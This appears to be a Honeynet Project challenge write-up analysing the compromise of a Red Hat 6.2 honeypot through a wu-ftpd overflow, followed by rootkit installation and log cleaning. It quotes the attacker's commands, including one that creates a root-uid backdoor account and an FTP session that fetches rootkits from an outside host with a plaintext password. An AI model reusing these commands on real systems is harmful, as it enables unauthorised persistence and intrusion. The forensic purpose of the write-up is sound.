The Challenge:
On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotly logging to 0.0.0.0 (remote syslog server IP has been replaced). The compromised system has an IP of 192.168.1.102. After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which is encrypted). The attacker also tried to hide some of his edits from the MAC times.
Downloads:
scan19.tar.gz, MD5 =11e0be295d138df14111796a7733a5d2
scan19.zip, MD5 = c065797b3c2ddfad3396e3d4542ed8a7
1. Which vulnerability did the intruder exploit?
2. What ways, and in what order, did the intruder use to connect and run commands on the system?
3. How did the intruder try to hide his edits from the MAC times?
4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
5. Recover (tell how you did it too) the rootkits from the snort binary capture
6. What does the rootkit do to hide the presence of the attacker on the system?
7. What did you learn from this exercise?
8. How long did this challenge take you?
Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.
The analysis:
$wget http://project.honeynet.org/scans/scan19/scan19.tar.gz $md5sum scan19.tar.gz 11e0be295d138df14111796a7733a5d2 scan19.tar.gz $mkdir scan19; cd scan19; tar xzf ../scan19.tar.gz
1. Which vulnerability did the intruder exploit?
Following this is the exploit for the STAT service which obviously is the "standard" buffer overflow which has apparently went unsuccessfully.
After that, no significant traffic towards the server until Sep. 17 at around 1am which consisted of a telnet session coming from 217.156.93.166 and consisted of login attempts under the nobody and uucp accounts which have both failed. Following a few attempt to connect to port 24 and 6666 (known Trojan likely port).
Eventually at 1:55am, the attacker connected from 207.35.251.172 to the ftp service (declared to be a wu-ftp 2.6.0) and logged in as the user ftp (anonymous). He then used the wu-ftp EXEC buffer overflow to force the ftp service to break down and eventually grand a shell access (over the ftp control connection).
2. What ways, and in what order, did the intruder use to connect and run commands on the system?
First he used the ftp control connection he buffer overflowed. Then he used telnet to login and install the rootkits. And finally, ssh for the last and final session.
The intruder then used his "shell over ftp" to run commands on the system and after verifying his identity ("id" answered by uid=0, gid=0 etc...) and users on the system ("w" which resulted in no users...), the attacker spent a few minutes browsing the filesystem, after which he started making his return more easy when he has deleted the nobody user's password (passwd nobody -d).
3. How did the intruder try to hide his edits from the MAC times?
After which, he decided to try and masquerade the changes made to /etc/passwd and the /etc directory by using "touch" to copy the timestamps and modification time of the above to temporary files (at /etc/X11/applnk/Internet/.etcpasswd and /etc/X11/applnk/Internet/.etc). The only problem is that he have performed the timestamp copying AFTER he altered the files once, so this action will be futile.
He creates a new user called "dns" with shell access and a home directory at /bin and has a userid and groupid of root:
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
He download a file (rootkit) Zer0.tar.gz from teleport.go.ro after authenticating as "teleport" with a password of "gunoierul". He then downloaded two more files: copy.tar.gz, and ooty.tar.gz.
Then he extracted the Zer0.tar.gz file, cd'd into the Zero dir and executed the rootkit's install script "Go". The rootkits seem to be an old rootkit with modifications (language is Romanian and some words in german)
5. Recover (tell how you did it too) the rootkits from the snort binary capture
The files were extracted from the snort logs by selecting an ftp DATA connection corresponding to the appropriate file (can be identified by the RETR ftp control command just before it. Then selecting "Follow TCP stream", and saving the output to a file.
6. What does the rootkit do to hide the presence of the attacker on the system?
It deleted lines from the syslog configured log files (and detected the remote logging... guess how the attacker looked like when he saw this...). The log cleaning procedure was run three times (probably until no lines needed to be removed...)
The final access (as mentioned before) has been done using ssh to connect to the server (after installing the backdoor in the ssh daemon of course...), during which the attacker cleaned some of the files he downloaded.
7. What did you learn from this exercise?
Remote logging is too valuable to be neglected. The attacker must have had some time looking at the message that he better have access to the remote logging host...
8. How long did this challenge take you?
Approximately 4-5 hours including the write-up.
Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.
Dear ____
I would like to inform you that someone from your network has abused his right for internet connection, and have performed illegal actions against a server in our network.
He has installed Trojans and abused the system.
Much evidence has been gathered that supports that (as you can see below).
We urge you to promptly take care of the person/s responsible for these actions.
Transcripts from the attacker session:
ftp teleport.go.ro Connected to teleport.go.ro. 220- 220- 220- H O M E . R O 220- 220- This server is for HOME.RO members only. 220- Go to http://www.home.ro/ to register. 220- 220- No anonymous access allowed. 220- 220- 220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42] Name (teleport.go.ro:nobody): teleport 331 Password required for teleport. Password:gunoierul 230 User teleport logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd new 250 CWD command successful. ftp> get Zer0.tar.gz local: Zer0.tar.gz remote: Zer0.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes). 226 Transfer complete. 139711 bytes received in 7.76 secs (18 Kbytes/sec) ftp> get copy.tar.gz local: copy.tar.gz remote: copy.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes). 226 Transfer complete. 265189 bytes received in 14.6 secs (18 Kbytes/sec) ftp> get ooty.tar.gz local: ooty.tar.gz remote: ooty.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes). 226 Transfer complete. 14847 bytes received in 0.856 secs (17 Kbytes/sec) ftp> bye 221 Goodbye.
220-HotMail (NO UCE) ESMTP server ready at Sun, 16 Sep 2001 17:46:55 -0700 220 ESMTP spoken here EHLO localhost.localdomain 250-hotmail.com Hello 250-8bitmime 250 SIZE 1572864 MAIL From:< root@localhost.localdomain> SIZE=2794 250 Requested mail action okay, completed RCPT To:< hatcheryhatched@hotmail.com> 250 Requested mail action okay, completed DATA 354 Start mail input; end with < CRLF>.< CRLF> Received: (from root@localhost) by localhost.localdomain (8.9.3/8.9.3) id FAA08755; Sun, 16 Sep 2001 05:01:57 -0400 Date: Sun, 16 Sep 2001 05:01:57 -0400 From: root < root@localhost.localdomain> MIME-Version: 1.0 To: hatcheryhatched@hotmail.com Subject: ns1 Message-ID: < 0_8752_1000630917_1@ns1> Content-ID: < 0_8752_1000630917_2@ns1> Content-type: text/richtext Content-Transfer-Encoding: quoted-printable [system information here...]